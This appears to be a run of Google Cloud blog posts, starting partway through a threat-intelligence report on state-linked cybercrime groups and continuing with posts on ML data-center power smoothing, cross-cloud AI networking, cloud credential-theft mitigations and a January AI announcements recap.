CIGAR (also tracked as UNC4895 and publicly reported as RomCom) is a dual financial and espionage-motivated threat group. Active since at least 2019, the group historically conducted financially motivated operations before expanding into espionage activity that GTIG judges fulfills espionage requirements in support of Russian national interests following the start of Russia’s full-scale invasion of Ukraine. CIGAR’s ongoing engagement in both types of activity differentiates the group from threat actors like APT44 or UNC2589, which leverage cybercrime actors and tooling toward state objectives. While the precise nature of the relationship between CIGAR and the Russian state is unclear, the group’s high operational tempo, constant evolution of its malware arsenal and delivery methods, and its access to and exploitation of multiple zero-day vulnerabilities suggest a level of sophistication and resourcefulness unusual for a typical cybercrime actor.
Targeted intrusion activity from CIGAR dates back to late 2022, targeting Ukrainian military and government entities. In October 2022, CERT-UA reported on a phishing campaign that distributed emails allegedly on behalf of the Press Service of the General Staff of the Armed Forces of Ukraine, which led to the deployment of the group’s signature RomCom malware. Two months later, in December 2022, CERT-UA highlighted a RomCom operation targeting users of DELTA, a situational awareness and battlefield management system used by the Ukrainian military.
CIGAR activity in 2023 and 2024 included the leveraging of zero-day vulnerabilities to conduct intrusion activity. In late June 2023, a phishing operation targeting European government and military entities used lures related to the Ukrainian World Congress, a nonprofit involved in advocacy for Ukrainian interests, and a then-upcoming NATO summit, to deploy the MAGICSPELL downloader, which exploited CVE-2023-36884 as a zero-day in Microsoft Word. In 2024, the group was reported to exploit the Firefox vulnerability CVE-2024-9680, chained together with the Windows vulnerability CVE-2024-49039, to deploy RomCom.
CONTI
At the outset of Russia’s full-scale invasion of Ukraine, the CONTI ransomware group publicly announced its support for the Russian government, and subsequent leaks of server logs allegedly containing chat messages from members of the group revealed that at least some individuals were interested in conducting targeted attacks, and may have been taking targeting directions from a third party. GTIG further assessed that former CONTI members comprise part of an initial access broker group conducting targeted attacks against Ukraine tracked by CERT-UA as UAC-0098.
UAC-0098 historically delivered the IcedID banking trojan, leading to human-operated ransomware attacks, and GTIG assesses that the group previously acted as an initial access broker for various ransomware groups including CONTI and Quantum. In early 2022, however, the actor shifted its focus to Ukrainian entities in the government and hospitality sectors as well as European humanitarian and nonprofit organizations.
UNC5174
UNC5174 uses the “Uteus” hacktivist persona, which has claimed to be affiliated with China’s Ministry of State Security, working as an access broker and possible contractor who conducts for-profit intrusions. UNC5174 has weaponized multiple vulnerabilities soon after they were publicly announced, attempting to compromise numerous devices before they could be patched. For example, in February 2024, UNC5174 was observed exploiting CVE-2024-1709 in ConnectWise ScreenConnect to compromise hundreds of institutions primarily in the US and Canada, and in April 2024, GTIG confirmed UNC5174 had weaponized CVE-2024-3400 in an attempt to exploit Palo Alto Networks’ (PAN’s) GlobalProtect appliances. In both cases, multiple China-nexus clusters were identified leveraging the exploits, underscoring how UNC5174 may enable additional operators.
Hybrid Groups Enable Cheap Capabilities
Another form of financially motivated activity supporting state goals comes from groups whose main mission may be state-sponsored espionage but that are, either tacitly or explicitly, allowed to conduct financially motivated operations to supplement their income. This can allow a government to offset the direct costs that would be required to maintain groups with robust capabilities.
Moonlighting Among Chinese Contractors
APT41
APT41 is a prolific cyber operator working out of the People’s Republic of China and most likely a contractor for the Ministry of State Security. In addition to state-sponsored espionage campaigns against a wide array of industries, APT41 has a long history of conducting financially motivated operations. The group’s cybercrime activity has mostly focused on the video game sector, including ransomware deployment. APT41 has also enabled other Chinese espionage groups, with digital certificates stolen by APT41 later employed by other Chinese groups. APT41’s cybercrime has continued since GTIG’s 2019 report, with the United States Secret Service attributing an operation that stole millions in COVID relief funds to APT41, and GTIG identifying an operation targeting state and local governments.
Iranian Groups Deploy Ransomware for Disruption and Profit
Over the past several years, GTIG has observed Iranian espionage groups conducting ransomware operations and disruptive hack-and-leak operations. Although much of this activity is likely primarily driven by disruptive intent, some actors working on behalf of the Iranian government may also be seeking ways to monetize stolen data for personal gain, and Iran’s declining economic climate may serve as an impetus for this activity.
UNC757
In August 2024, the US Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and Department of Defense Cyber Crime Center (DC3) released a joint advisory indicating that a group of Iran-based cyber actors known as UNC757 collaborated with ransomware affiliates including NoEscape, Ransomhouse, and ALPHV to gain network access to organizations across various sectors and then help the affiliates deploy ransomware for a percentage of the profits. The advisory further indicated that the group stole data from targeted networks likely in support of the Iranian government, and their ransomware operations were likely not sanctioned by the Government of Iran.
GTIG is unable to independently corroborate UNC757’s reported collaboration with ransomware affiliates. However, the group has historical, suspected ties to the persona “nanash” that posted an advertisement in mid-2020 on a cybercrime forum claiming to have access to various networks, as well as hack-and-leak operations associated with the PAY2KEY ransomware and corresponding persona that targeted Israeli firms.
Examples of Dual Motive (Financial Gain and Espionage)
In multiple incidents, individuals who have conducted cyber intrusions on behalf of the Iranian government have also been identified conducting financially motivated intrusions.
A 2020 US Department of Justice indictment indicated that two Iranian nationals conducted cyber intrusion operations targeting data “pertaining to national security, foreign policy intelligence, non-military nuclear information, aerospace data, human rights activist information, victim financial information and personally identifiable information, and intellectual property, including unpublished scientific research.” The intrusions in some cases were conducted at the behest of the Iranian government, while in other instances, the defendants sold hacked data for financial gain.
In 2017, the US DoJ indicted an Iranian national who attempted to extort HBO by threatening to release stolen content. The individual had previously worked on behalf of the Iranian military to conduct cyber operations targeting military and nuclear software systems and Israeli infrastructure.
DPRK Cyber Threat Actors Conduct Financially Motivated Operations to Generate Revenue for Regime, Fund Espionage Campaigns
Financially motivated operations are broadly prevalent among threat actors linked to the Democratic People’s Republic of Korea (DPRK). These include groups focused on generating revenue for the regime as well as those that use the illicit funds to support their intelligence-gathering efforts. Their cybercrime operations focus on the cryptocurrency sector and blockchain-related platforms, leveraging tactics including but not limited to the creation and deployment of malicious applications posing as cryptocurrency trading platforms and the airdropping of malicious non-fungible tokens (NFTs) that redirect the user to wallet-stealing phishing websites. A March 2024 United Nations (UN) report estimated North Korean cryptocurrency theft between 2017 and 2023 at approximately $3 billion.
APT38
APT38, a financially motivated group aligned with the Reconnaissance General Bureau (RGB), was responsible for the attempted theft of vast sums of money from institutions worldwide, including via compromises targeting SWIFT systems. Public reporting has associated the group with the use of money mules and casinos to withdraw and launder funds from fraudulent ATM and SWIFT transactions. In publicly reported heists alone, APT38’s attempted thefts from financial institutions totaled over $1.1 billion USD, and by conservative estimates, successful operations have amounted to over $100 million USD. The group has also deployed destructive malware against target networks to render them inoperable following theft operations. While APT38 now appears to be defunct, we have observed evidence of its operators regrouping into other clusters, including those heavily targeting cryptocurrency and blockchain-related entities and other financial institutions.
UNC1069 (CryptoCore), UNC4899 (TraderTraitor)
Limited indicators suggest that threat clusters GTIG tracks as UNC1069 (publicly referred to as CryptoCore) and UNC4899 (also reported as TraderTraitor) are successors to the now-defunct APT38. These clusters focus on financial gain, primarily by targeting cryptocurrency and blockchain entities. In December 2024, a joint statement released by the US FBI, DC3, and National Police Agency of Japan (NPA) reported on TraderTraitor’s theft of cryptocurrency then valued at $308 million USD from a Japan-based company.
APT43 (Kimsuky)
APT43, a prolific cyber actor whose collection requirements align with the mission of the RGB, funds itself through cybercrime operations to support its primary mission of collecting strategic intelligence, in contrast to groups focused primarily on revenue generation like APT38. While the group’s espionage targeting is broad, it has demonstrated a particular interest in foreign policy and nuclear security, leveraging moderately sophisticated technical capabilities coupled with aggressive social engineering tactics against government organizations, academia, and think tanks. Meanwhile, APT43’s financially motivated operations focus on stealing and laundering cryptocurrency to buy operational infrastructure.
UNC3782
UNC3782, a suspected North Korean threat actor active since at least 2022, conducts both financial crime operations against the cryptocurrency sector and espionage activity, including the targeting of South Korean organizations attempting to combat cryptocurrency-related crimes, such as law firms and related government and media entities. UNC3782 has targeted users on cryptocurrency platforms including Ethereum, Bitcoin, Arbitrum, Binance Smart Chain, Cronos, Polygon, TRON, and Solana; Solana in particular constitutes a target-rich environment for criminal actors due to the platform’s rapid growth.
APT45 (Andariel)
APT45, a North Korean cyber operator active since at least 2009, has conducted espionage operations focusing on government, defense, nuclear, and healthcare and pharmaceutical entities. The group has also expanded its remit to financially motivated operations, and we suspect that it engaged in the development of ransomware, distinguishing it from other DPRK-nexus actors.
DPRK IT Workers
DPRK IT workers pose as non-North Korean nationals seeking employment at a wide range of organizations globally to generate revenue for the North Korean regime, enabling it to evade sanctions and fund its weapons of mass destruction (WMD) and ballistic missile programs. IT workers have also increasingly leveraged their privileged access at employer organizations to engage in or enable malicious intrusion activity and, in some cases, to extort those organizations with threats of data leaks or sales of proprietary company information following the termination of their employment.
While DPRK IT worker operations are widely reported to target US companies, they have increasingly expanded to Europe and other parts of the world. Tactics to evade detection include the use of front companies and the services of “facilitators,” non-North Korean individuals who provide services such as money and/or cryptocurrency laundering, assistance during the hiring process, and receiving and hosting company laptops to enable the workers’ remote access, in exchange for a percentage of the workers’ incomes.
A Comprehensive Approach is Required
We believe tackling this challenge will require a new and stronger approach recognizing the cybercriminal threat as a national security priority requiring international cooperation. While some welcome enhancements have been made in recent years, more must—and can—be done. The structure of the cybercrime ecosystem makes it particularly resilient to takedowns. Financially motivated actors tend to specialize in a single facet of cybercrime and regularly work with others to accomplish bigger schemes. While some actors may repeatedly team up with particular partners, actors regularly have multiple suppliers (or customers) for a given service.
If a single ransomware-as-a-service provider is taken down, many others are already in place to fill in the gap that has been created. This resilient ecosystem means that while individual takedowns can disrupt particular operations and create temporary inconveniences for cybercriminals, these methods need to be paired with wide-ranging efforts to improve defense and crack down on these criminals’ ability to carry out their operations. We urge policymakers to consider taking a number of steps:
Demonstrably elevate cybercrime as a national security priority: Governments must recognize cybercrime as a pernicious national security threat and allocate resources accordingly. This includes prioritizing intelligence collection and analysis on cybercriminal organizations, enhancing law enforcement capacity to investigate and prosecute cybercrime, and fostering international cooperation to dismantle these transnational networks.
Strengthen cybersecurity defenses: Policymakers should promote the adoption of robust cybersecurity measures across all sectors, particularly critical infrastructure. This includes incentivizing the implementation of security best practices, investing in research and development of advanced security technologies, enabling digital modernization and uptake of new technologies that can advantage defenders, and supporting initiatives that enhance the resilience of digital systems against attacks and related deceptive practices.
Disrupt the cybercrime ecosystem: Targeted efforts are needed to disrupt the cybercrime ecosystem by targeting key enablers such as malware developers, bulletproof hosting providers, and financial intermediaries such as cryptocurrency exchanges. This requires a combination of legal, technical, and financial measures to dismantle the infrastructure that supports cybercriminal operations and coordinated international efforts to enable the same.
Enhance international cooperation: Cybercrime transcends national borders, necessitating strong international collaboration to effectively combat this threat. Policymakers should prioritize and resource international frameworks for cyber threat information sharing, joint investigations, and coordinated takedowns of cybercriminal networks, including by actively contributing to the strengthening of international organizations and initiatives dedicated to combating cybercrime, such as the Global Anti-Scams Alliance (GASA). They should also prioritize collective efforts to publicly decry malicious cyber activity through joint public attribution and coordinated sanctions, where appropriate.
Empower individuals and businesses: Raising awareness about cyber threats and promoting cybersecurity education is crucial to building a resilient society. Policymakers should support initiatives that educate individuals and businesses about online safety, encourage the adoption of secure practices, empower service providers to take action against cybercriminals including through enabling legislation, and provide resources for reporting and recovering from cyberattacks.
Elevate strong private sector security practices: Ransomware and other forms of cybercrime predominantly exploit insecure, often legacy technology architectures. Policymakers should consider steps to prioritize technology transformation, including the adoption of technologies/products with a strong security track record; diversifying vendors to mitigate risk resulting from overreliance on a single technology; and requiring interoperability across the technology stack.
About the Authors
Google Threat Intelligence Group brings together the Mandiant Intelligence and Threat Analysis Group (TAG) teams, and focuses on identifying, analyzing, mitigating, and eliminating entire classes of cyber threats against Alphabet, our users, and our customers. Our work includes countering threats from government-backed attackers, targeted 0-day exploits, coordinated information operations (IO), and serious cybercrime networks. We apply our intelligence to improve Google’s defenses and protect our users and customers.
The recent explosion of machine learning (ML) applications has created unprecedented demand for power delivery in the data center infrastructure that underpins those applications. Unlike server clusters in the traditional data center, where tens of thousands of workloads coexist with uncorrelated power profiles, large-scale batch-synchronized ML training workloads exhibit substantially different power usage patterns. Under these new usage conditions, it is increasingly challenging to ensure the reliability and availability of the ML infrastructure, as well as to improve data-center goodput and energy efficiency.
Google has been at the forefront of data center infrastructure design for several decades, with a long list of innovations to our name. In this blog post, we highlight one of the key innovations that allowed us to manage unprecedented power and thermal fluctuations in our ML infrastructure. This innovation underscores the power of full codesign across the stack — from ASIC chip to data center, across both hardware and software. We also discuss the implications of this approach and propose a call to action for the broader industry.
New ML workloads lead to new ML power challenges
Today’s ML workloads require synchronized computation across tens of thousands of accelerator chips, together with their hosts, storage, and networking systems; these workloads often occupy one entire data-center cluster — or even multiple clusters. The peak power utilization of these workloads can approach the rated power of all the underlying IT equipment, making power oversubscription much more difficult. Furthermore, power consumption rises and falls between idle and peak utilization levels much more steeply, because the entire cluster’s power usage is now dominated by no more than a few large ML workloads. You can observe these power fluctuations when a workload launches or finishes, or when it is halted, then resumed or rescheduled. You may also observe a similar pattern when the workload is running normally, mostly attributable to alternating compute- and networking-intensive phases of the workload within a training step. Depending on the workload’s characteristics, these inter- and intra-job power fluctuations can occur very frequently. This can result in multiple unintended consequences for the functionality, performance, and reliability of the data center infrastructure.
Fig. 1. Large power fluctuations observed on cluster level with large-scale synchronized ML workloads
In fact, in our latest batch-synchronous ML workloads running on dedicated ML clusters, we observed power fluctuations in the tens of megawatts (MW), as shown in Fig. 1. Compared to a traditional load-variation profile, the ramp speed can be almost instantaneous, repeat as frequently as every few seconds, and persist for weeks — or even months.
Fluctuations of this kind pose the following risks:
Functionality and long-term reliability issues with rack and data center equipment (including but not limited to rectifiers, transformers, generators, cables, and busways), resulting in hardware-induced outages, reduced energy efficiency, and increased operational/maintenance costs
Damage, outage, or throttling at the upstream utility, including violation of contractual commitments to the utility on power usage profiles, and corresponding financial costs
Unintended and frequent triggering of the uninterruptible power supply (UPS) system from large power fluctuations, resulting in a shortened lifetime of the UPS system
Large power fluctuations may also impact hardware reliability at a much smaller per-chip or per-system scale. Although the maximum temperature is well under control, power fluctuations may still translate into large and frequent temperature fluctuations, triggering various forms of interactions including warpage, changes to thermal interface material property, and electromigration.
A full-stack approach to proactive power shaping
Due to the high complexity and large scale of our data-center infrastructure, we posited that proactively shaping a workload’s power profile could be more efficient than simply adapting to it. Google’s full codesign across the stack — from chip to data center, from hardware to software, and from instruction set to realistic workload — provides us with all the knobs we need to implement highly efficient end-to-end power management features to regulate our workloads’ power profiles and mitigate detrimental fluctuations.
Specifically, we instrumented the TPU compiler to detect signatures in the workload that are linked to power fluctuations, such as sync flags. We then dynamically balance the activities of the TPU’s major compute blocks around these flags to smooth out their utilization over time. This achieves our goal of mitigating power and thermal fluctuations with negligible performance overhead. In the future, we may also apply a similar approach to a workload’s starting and completion phases, resulting in a gradual, rather than abrupt, change in power levels.
We’ve now implemented this compiler-based approach to shaping the power profile and applied it to realistic workloads. We measured the system’s total power consumption and a single chip’s hotspot temperature with, and without, the mitigation, as plotted in Fig. 2 and Fig. 3, respectively. In the test case, the magnitude of power fluctuations dropped by nearly 50% from the baseline case to the mitigation case. The magnitude of temperature fluctuations also dropped from ~20°C in the baseline case to ~10°C in the mitigation case. We measured the cost of the mitigation as the increase in average power consumption and in the length of the training step. With proper tuning of the mitigation parameters, we achieved these benefits with only a small increase in average power and <1% performance impact.
Fig. 2. Power fluctuation with and without the compiler-based mitigation
Fig. 3. Chip temperature fluctuation with and without the compiler-based mitigation
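As a rough illustration of the idea (and not Google’s actual implementation), the following Python sketch models a batch-synchronized workload as a square-wave cluster power trace and redistributes activity over a small window around each point, the same effect the compiler achieves by balancing compute around sync flags. All numbers are illustrative assumptions.

```python
def workload_power(steps, half_period=4, low_mw=4.0, high_mw=24.0):
    """Square-wave cluster power trace (MW): alternating compute-
    and networking-intensive phases of a synchronized ML job."""
    return [high_mw if (t // half_period) % 2 == 0 else low_mw
            for t in range(steps)]

def shape_power(trace, window=2):
    """Spread activity over +/- `window` steps around each point,
    mimicking the compiler smoothing utilization around sync flags."""
    shaped = []
    for t in range(len(trace)):
        lo, hi = max(0, t - window), min(len(trace), t + window + 1)
        shaped.append(sum(trace[lo:hi]) / (hi - lo))
    return shaped

def fluctuation(trace):
    """Peak-to-trough swing of a power trace."""
    return max(trace) - min(trace)

base = workload_power(100)
shaped = shape_power(base)
interior = slice(4, -4)  # ignore edge effects of the smoothing window
print(fluctuation(base[interior]), fluctuation(shaped[interior]))
```

In this toy trace, the peak-to-trough swing drops from 20 MW to 12 MW, a 40% reduction that is qualitatively in line with the near-50% reduction reported above, while the average power (total work) stays essentially unchanged.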
A call to action
ML infrastructure is growing rapidly and is expected to surpass traditional server infrastructure in terms of total power demand in the coming years. At the same time, ML infrastructure’s power and temperature fluctuations are unique and tightly coupled with the ML workload’s characteristics. Mitigating these fluctuations is just one example of the many innovations we need to ensure reliable and high-performance infrastructure. In addition to the method described above, we’ve been investing in an array of innovative techniques to take on ever-increasing power and thermal challenges, including data center water cooling, vertical power delivery, power-aware workload allocation, and many more.
But these challenges aren’t unique to Google. Power and temperature fluctuations in ML infrastructure are becoming a common issue for many hyperscalers and cloud providers as well as infrastructure providers. We need partners at all levels of the system to help:
Utility providers to set forth a standardized definition of acceptable power quality metrics — especially in scenarios where multiple data centers with large power fluctuations coexist within the same grid and interact with one another
Power and cooling equipment suppliers to offer quality and reliability enhancements for electronics components, particularly for use-conditions with large and frequent power and thermal fluctuations
Hardware suppliers and data center designers to create a standardized suite of solutions such as rack-level capacitor banks (RLCB) or on-chip features, to help establish an efficient supplier base and ecosystem
ML model developers to consider the energy-consumption characteristics of the model, and to add low-level software mitigations that help address energy fluctuations
Google has been leading and advocating for industry-wide collaboration on these issues through forums such as Open Compute Project (OCP) to benefit the data center infrastructure industry as a whole. We look forward to continuing to share our learnings and collaborating on innovative new solutions together.
A special thanks to Denis Vnukov, Victor Cai, Jianqiao Liu, Ibrahim Ahmed, Venkata Chivukula, Jianing Fan, Gaurav Gandhi, Vivek Sharma, Keith Kleiner, Mudasir Ahmad, Binz Roy, Krishnanjan Gubba Ravikumar, Ashish Upreti and Chee Chung from Google Cloud for their contributions.
At Google Cloud, we strive to make it easy to deploy AI models onto our infrastructure. In this blog we explore how the Cross-Cloud Network solution supports your AI workloads.
Managed and Unmanaged AI options
Google Cloud provides both managed (Vertex AI) and do-it-yourself (DIY) approaches for running AI workloads.
Vertex AI: A fully managed machine learning platform. Vertex AI offers both pre-trained Google models and access to third-party models through Model Garden. As a managed service, Vertex AI handles infrastructure management, allowing you to concentrate on training, tuning, and inferencing your AI models.
Custom infrastructure deployments: These deployments utilize various compute, storage and networking options based on the type of workload the user is running. AI Hypercomputer is one way to deploy both HPC workloads that may not require GPU and TPUs, and also AI workloads running TPUs or GPUs.
Networking for managed AI
With Vertex AI you don’t have to worry about the underlying infrastructure. For network connectivity, the service is accessible via public API by default. Enterprises that want private connectivity can choose among Private Service Access, Private Google Access, Private Service Connect endpoints, and Private Service Connect for Google APIs. The right option varies based on the specific Vertex AI service you are using. You can learn more in the Accessing Vertex AI from on-premises and multicloud documentation.
Networking AI infrastructure deployments
Let’s look at a sample case: an organization has data located in another cloud and would like to deploy an AI cluster with GPUs on Google Cloud.
Based on this need, we can analyze the networking requirements across planning, data ingestion, training, and inference.
Planning: This crucial initial phase involves defining your requirements: the size of the cluster (number of GPUs), the type of GPUs needed, the desired region and zone for deployment, storage, and the anticipated network bandwidth for transfers. This planning informs the subsequent steps. For instance, training a large language model like LLaMA, which has billions of parameters, requires a significantly larger cluster than fine-tuning a smaller model.
Data ingestion: Since the data is located in another cloud, you need a high-speed connection so that the data can be accessed directly or transferred to a storage option in Google Cloud. To facilitate this, Cross-Cloud Interconnect offers a direct connection at high bandwidth with a choice of 10Gbps or 100Gbps per link. Alternatively if the data is located on-premises, you can use Cloud Interconnect.
Training: Training workloads demand high-bandwidth, low-latency, and lossless cluster networking. You can achieve GPU-to-GPU communication that bypasses the system OS with Remote Direct Memory Access (RDMA). Google Cloud networking supports the RDMA over Converged Ethernet (RoCE) protocol in special network VPCs using the RDMA network profile. Proximity matters: for best performance, nodes and clusters should be placed as close to each other as possible.
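For the planning phase above, cluster sizing can be sanity-checked with the widely used rule of thumb that training a dense transformer costs roughly 6 FLOPs per parameter per token. The sketch below is illustrative only; the per-accelerator throughput and model FLOPs utilization (MFU) figures are assumptions, not specifications for any particular GPU.

```python
def accelerators_needed(params: float, tokens: float, days: float,
                        peak_flops: float = 1e15, mfu: float = 0.4) -> float:
    """Rough cluster size: total training FLOPs (~6 * params * tokens)
    divided by sustained per-accelerator throughput over the time budget."""
    total_flops = 6 * params * tokens
    sustained = peak_flops * mfu  # sustained FLOP/s per accelerator
    return total_flops / (sustained * days * 86_400)

# e.g., a 70B-parameter model on 2T tokens in 30 days,
# assuming 1 PFLOP/s peak per accelerator at 40% MFU
print(round(accelerators_needed(70e9, 2e12, 30)))
```

Under these assumed numbers the estimate comes to roughly 810 accelerators, which illustrates why training a frontier-scale model needs a far larger cluster than fine-tuning does.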
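For the data-ingestion phase, the number of Cross-Cloud Interconnect links can be sanity-checked with back-of-the-envelope arithmetic. The dataset size and the 80% effective-utilization figure below are assumptions for illustration, not measured values.

```python
def transfer_hours(data_tb: float, links: int,
                   gbps_per_link: float = 100.0,
                   efficiency: float = 0.8) -> float:
    """Estimated bulk-transfer time over Cross-Cloud Interconnect links."""
    effective_gbps = links * gbps_per_link * efficiency
    bits = data_tb * 8e12  # 1 TB = 8 * 10^12 bits (decimal)
    return bits / (effective_gbps * 1e9) / 3600

# e.g., 500 TB over two 100 Gbps links at 80% efficiency
print(round(transfer_hours(500, links=2), 1))
```

With these assumptions, a 500 TB dataset moves in roughly 7 hours over two 100 Gbps links; halving the links roughly doubles the time, which is the trade-off to weigh during planning.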
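To see why the training phase needs RDMA-class bandwidth, consider the gradient all-reduce performed each training step: with a ring all-reduce, every GPU sends and receives roughly 2*(n-1)/n times the gradient size per step. The model size, precision, and GPU count below are illustrative assumptions.

```python
def ring_allreduce_gb(params: float, n_gpus: int,
                      bytes_per_value: int = 2) -> float:
    """Approximate data each GPU moves per all-reduce (ring algorithm)."""
    grad_gb = params * bytes_per_value / 1e9  # gradient size in GB
    return 2 * (n_gpus - 1) / n_gpus * grad_gb

# e.g., 70B parameters with bf16 gradients across 256 GPUs
print(round(ring_allreduce_gb(70e9, 256), 1))
```

Under these assumptions, each GPU moves on the order of 280 GB per all-reduce, repeated every training step, which is why lossless, high-bandwidth RoCE fabrics and physical proximity between nodes matter so much.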
Threat actors who target cloud environments are increasingly focusing on exploiting compromised cloud identities. A compromise of human or non-human identities can lead to increased risks, including cloud resource abuse and sensitive data exfiltration. These risks are exacerbated by the sheer number of identities in most organizations; as they grow, the attack surface they represent also grows.
As described in the latest Google Cloud Threat Horizons Report, organizations should prioritize measures that can strengthen identity protection.
“We recommend that organizations incorporate automation and awareness strategies such as strong password policies, mandatory multi-factor authentication, regular reviews of user access and cloud storage bucket security, leaked credential monitoring on the dark web, and account lockout mechanisms,” said Iain Mulholland, senior director, Security Engineering, in last week’s Cloud CISO Perspectives newsletter.
Today, we are detailing key risk mitigations from Google Cloud security experts that you can quickly act on. Every organization should evaluate these mitigations as part of their efforts to protect their cloud deployments.
Google Cloud’s built-in protections
Google Cloud provides always-on account protection measures that help mitigate credential theft. Many of these protections are based on heuristics that detect likely credential theft and terminate an attacker’s session. Others limit the use of suspected stolen cookies to minutes, instead of hours.
Google Cloud requires users to reauthenticate to confirm the validity of their credentials before allowing many sensitive actions in the Cloud Console. This reauthentication can happen deterministically or based on a risk score.
Google Cloud sets default Organization Policies on newly created organizations to guard against common risks of service credential theft and sharing of resources.
However, as attacker tactics evolve, it’s important to have additional layers of defense in place spanning multi-factor authentication (MFA), protecting sessions, protecting service credentials, identity and access controls, and security monitoring.
Google Cloud customers are encouraged to adopt the following measures to help increase protection against credential theft:
Multi-factor authentication (MFA): As part of our shared fate approach to help customers, we recently described our plans to make MFA mandatory for all Google Cloud users this year. If you have not enabled MFA yet, you can take these steps in advance of mandatory enforcement:
Enable MFA on your primary Identity Provider (IdP). For Google Cloud customers who use Google Cloud Identity as their primary IdP, follow these instructions.
Add an MFA instrument to Google Cloud Identity accounts for re-authentication. If Google Cloud Identity is not your primary IdP, this provides an independent layer of verification prior to allowing sensitive actions. Follow these instructions.
Configure your IdP to always challenge (ideally with MFA) when accessing Google. When Google Cloud customers use Cloud Identity with their own IdP through SAML or OIDC, Cloud Identity queries the IdP for an attestation when the session expires or when Google Cloud requires re-authentication. In the default configuration, IdPs silently approve all these attestations to minimize user friction. However, most IdPs can be configured to always require re-entering credentials, and even to always require MFA whenever Google Cloud requests an attestation. This configuration can be set up to only apply to the app representing Google Cloud, and not for all apps that the IdP federates for a smoother user and administrative experience.
Protecting sessions: We recommend four controls that can help increase session protection:
Limiting session length can reduce the usefulness of stolen cookies. The default session length is 16 hours, and is user-configurable. Here are instructions for setting session length, and you can read more on session length management.
Limiting IPs allowed to access Cloud Console and APIs with Context-Aware Access (CAA) can make stolen credentials useless (unless the attacker has access to allowlisted IPs, such as the corporate network or VPN IPs).
Certificate-based access can be used to require mTLS certificates to access Cloud Console and Google Cloud APIs. mTLS provides strong protection against cookie theft, requiring users to present an mTLS certificate in addition to existing credentials such as cookies. mTLS certificates are typically stored in the Trusted Platform Module (TPM) of the user’s device, making them extremely difficult for an attacker to steal. Many enterprises already deploy mTLS certificates to their users, and Google Cloud allows customers to either reuse their existing mTLS certificates, or use new ones just for Google Cloud.
Contextual-access restrictions can be configured with Access Context Manager, which allows Google Cloud organization administrators to define fine-grained, attribute-based access control for projects and resources. Access levels can be configured to require additional device and user attributes to be met in order for a resource request to be successful. For example, you can require that a corporate-managed device be used to access and configure resources.
Protecting service credentials: Organizations should also build layered protection for non-human identities. Google Cloud offers detailed best practices for managing, using, and securing service account keys and API keys. Three important controls to consider:
Disable creation of service account keys: This Organization Policy setting prevents users from creating persistent keys for service accounts. Instead of allowing unqualified use of service account keys, choose the right authentication method for your use case, and allow exceptions for service account keys only for scenarios that cannot use more secure alternatives.
Disable leaked service account keys automatically: Google Cloud regularly scans public repositories (including GitHub and GitLab) for leaked service account keys. If Google Cloud detects an exposed key, it will automatically disable the key. It also creates a Cloud Audit Logs event and sends a notification about the exposed key to project owners and security contacts. We strongly recommend not modifying the DISABLE_KEY option (which is on by default).
Binding service account keys to trusted networks: Context-Aware Access for service accounts enables customers to bind service accounts to an IP range or specific VPC networks, and to enforce that service accounts can access Google Cloud services and APIs only from these trusted networks. Customers can request early access to this control using this form.
Identity and access controls: Adhering to the principle of least privilege can help limit the impact of credential compromise; use these controls to limit access and privileges to only what users need to perform their job functions.
Google Cloud Identity and Access Management (IAM) lets you grant granular access to specific Google Cloud resources and can help prevent access to other resources. Permissions are grouped into roles, and roles are granted to authenticated principals. You should regularly review and right-size permissions using tools such as IAM Recommender. The Google Cloud Architecture Framework provides additional best practices for managing identity and access.
VPC Service Controls enable a powerful, context-aware approach to control access for your cloud resources. You can create granular access control policies based on attributes such as user identity and IP address. These policies ensure specific security controls are in place before granting access to cloud resources from untrusted networks. By allowing access only from authorized networks, VPC Service Controls helps protect against the risk of data exfiltration presented by clients using stolen OAuth or service account credentials.
Principal access boundaries can precisely define the resources that a principal is eligible to access. If a policy makes a principal ineligible to access a resource, then their access to that resource is limited regardless of the roles they’ve been granted.
Restrict identities by domain using domain-restricted sharing to limit role grants to users belonging to a specific domain or organization. When domain restricted sharing is active, only principals that belong to allowed domains or organizations can be granted IAM roles in your Google Cloud organization.
Security monitoring: In addition to implementing preventative controls, you should proactively monitor your cloud environment for signs of compromise. Early detection can help limit the business impact of a compromise.
Security Command Center (SCC) is Google Cloud’s built-in security and risk management platform. It provides comprehensive security posture management, threat detection, and compliance monitoring.
With SCC’s Cloud Infrastructure Entitlement Management (CIEM) capabilities, you can manage which identities have access to which resources in your deployments, mitigate potential vulnerabilities that result from misconfigurations, and enforce the principle of least privilege. The Sensitive Actions Service within SCC automatically detects and alerts on potentially damaging actions occurring across your cloud organization, folders, and projects. SCC’s Virtual Red Teaming capability continuously detects if high value resources are exposed and surfaces the identities and access paths that could lead to compromise.
Next steps
Maintaining a strong security posture requires ongoing evaluation of the risks your organization faces, and the controls you have in place to address them. These recommendations can help you strengthen your cloud estate against the growing risks associated with credential compromise.
You can learn more about protecting your Google Cloud deployments in our security Best Practices Center.
2025 is off to a racing start. From announcing strides in the new Gemini 2.0 model family to retailers accelerating with Cloud AI, we spent January investing in our partner ecosystem, open source, and ways to make AI more useful. We’ve heard from people everywhere, from developers to CMOs, about the pressure to adopt the latest in AI with efficiency and speed – and the delicate balance of being both conservative and forward-thinking. We’re here to help. Each month, we’ll post a retrospective that recaps Google Cloud’s latest announcements in AI – and importantly, how to make the most of these innovations.
Top announcements: Bringing AI to you
This month, we announced agent evaluation in Vertex AI. A surprise to nobody, AI agents are top of mind for many industries looking to deploy their AI and boost productivity. But closing the gap between impressive model demos and real-world performance is crucial for successfully deploying generative AI. That’s why we announced Vertex AI’s RAG Engine, a fully managed service that helps you build and deploy RAG implementations with your data and methods. Together, these new innovations can help you build reliable, trustworthy models.
From an infrastructure perspective, we announced new updates to AI Hypercomputer. We wanted to make it easier for you to run large multi-node workloads on GPUs, so we launched A3 Ultra VMs and Hypercompute Cluster, our new highly scalable clustering system. This builds on multiple advancements in AI infrastructure, including Trillium, our sixth-generation TPU.
At the same time, we shared several important announcements in the world of open-source. We announced Mistral AI’s Mistral Large 24.11 and Codestral 25.01 models on Vertex AI. These models will help developers write code and build faster – from high-complexity tasks to reasoning tasks, like creative writing. To help you get started, we provided sample code and documentation.
And, most recently, we announced the public beta of Gen AI Toolbox for Databases in partnership with LangChain, the leading orchestration framework for developers building LLM applications. Toolbox is an open-source server that empowers application developers to connect production-grade, agent-based generative AI applications to databases. You can get started here.
Industry news: Google Cloud at the National Retail Federation (NRF)
